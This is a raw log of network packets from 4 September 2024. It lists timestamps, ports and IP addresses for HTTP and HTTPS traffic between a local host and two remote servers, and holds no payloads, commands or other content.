Sep 4, 2024 17:37:08.609812975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609832048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609909058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609920979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609930992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609941006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609947920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609958887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.609983921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.609983921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.610017061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.610152006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.610162020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.610169888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.610181093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.610189915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.610192060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.610199928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.610200882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.610212088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.610214949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.610232115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.610258102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.611639977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611681938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.611694098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611706018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611736059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.611745119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611746073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.611778021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.611808062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611818075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611826897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611838102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611844063 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.611854076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.611869097 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.611877918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.611972094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611984015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.611993074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612004042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612014055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612014055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612036943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612060070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612071037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612106085 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612109900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612143993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612184048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612194061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612219095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612226963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612232924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612257957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612267017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612267017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612289906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612298012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612302065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612312078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612335920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612350941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612396955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612406969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612416029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612425089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612432957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612433910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612441063 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612464905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612546921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612557888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612584114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612596035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612720966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612751007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612761021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612766027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612790108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612790108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612832069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612844944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612867117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612878084 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612911940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612925053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.612948895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.612970114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.614387989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.614407063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.614427090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.614439964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.614456892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.614468098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.614478111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.614486933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.614500999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.614511967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.614541054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.614552021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.614571095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.614579916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.654628992 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.654644012 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.654701948 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.654711008 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.654747009 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.656163931 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.656177998 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.656224966 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.656232119 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.656265974 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.658808947 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.658823013 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.658869028 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.658875942 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.658910990 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.660953999 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.660969019 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.661035061 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.661041975 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.661053896 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.661067009 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.661354065 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.661374092 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.661412001 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.661420107 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.661454916 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.661756992 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.661770105 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.661808968 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.661815882 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.661828041 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.661854029 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.662662983 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.662678957 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.662720919 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.662729979 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.662764072 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.663269997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663319111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663341045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663352966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663386106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663392067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663394928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663407087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663417101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663434982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663450003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663531065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663542986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663552999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663564920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663573027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663577080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663585901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663590908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663615942 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663633108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663666964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663676977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663686991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663701057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663712978 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663758039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663770914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663781881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663793087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663800001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663803101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663816929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663819075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663829088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663841963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663851023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663860083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663872957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663933992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663948059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663968086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.663970947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.663985014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.664150000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.664167881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.664179087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.664185047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.664185047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.664190054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.664207935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.664216042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.664222002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.664239883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.664242983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.664252043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.664256096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.664264917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.664283991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.664298058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.667589903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667602062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667613029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667637110 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.667665005 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.667737007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667758942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667769909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667776108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.667779922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667795897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667804956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.667824984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.667931080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667942047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667951107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667968035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667974949 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.667979956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.667984962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668015957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668066025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668077946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668087959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668100119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668100119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668122053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668123960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668135881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668148041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668147087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668165922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668175936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668178082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668186903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668190956 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668200016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668220043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668245077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668272972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668289900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668302059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668312073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668317080 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668323994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668330908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668335915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668349028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668359041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668360949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668370962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668374062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668385983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668397903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668399096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668423891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668442011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668661118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668677092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668689966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668699980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668705940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668713093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668715954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668725967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668736935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668739080 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668747902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668759108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668762922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668770075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668771029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668782949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668793917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668802023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668806076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668818951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668824911 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668831110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668842077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668843985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668853998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668864965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668868065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668881893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.668896914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668905020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.668931007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669091940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669102907 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669112921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669123888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669131041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669135094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669142962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669147015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669169903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669182062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669241905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669258118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669269085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669276953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669280052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669292927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669295073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669305086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669306993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669316053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669327021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669328928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669337034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669348955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669354916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669361115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669368982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669384956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669397116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669400930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669411898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669420004 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669424057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669435978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669445038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669471979 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669697046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669708967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669719934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669732094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669739962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.669744968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.669756889 CEST	80	49719	147.45.44.104	192.168.2.6
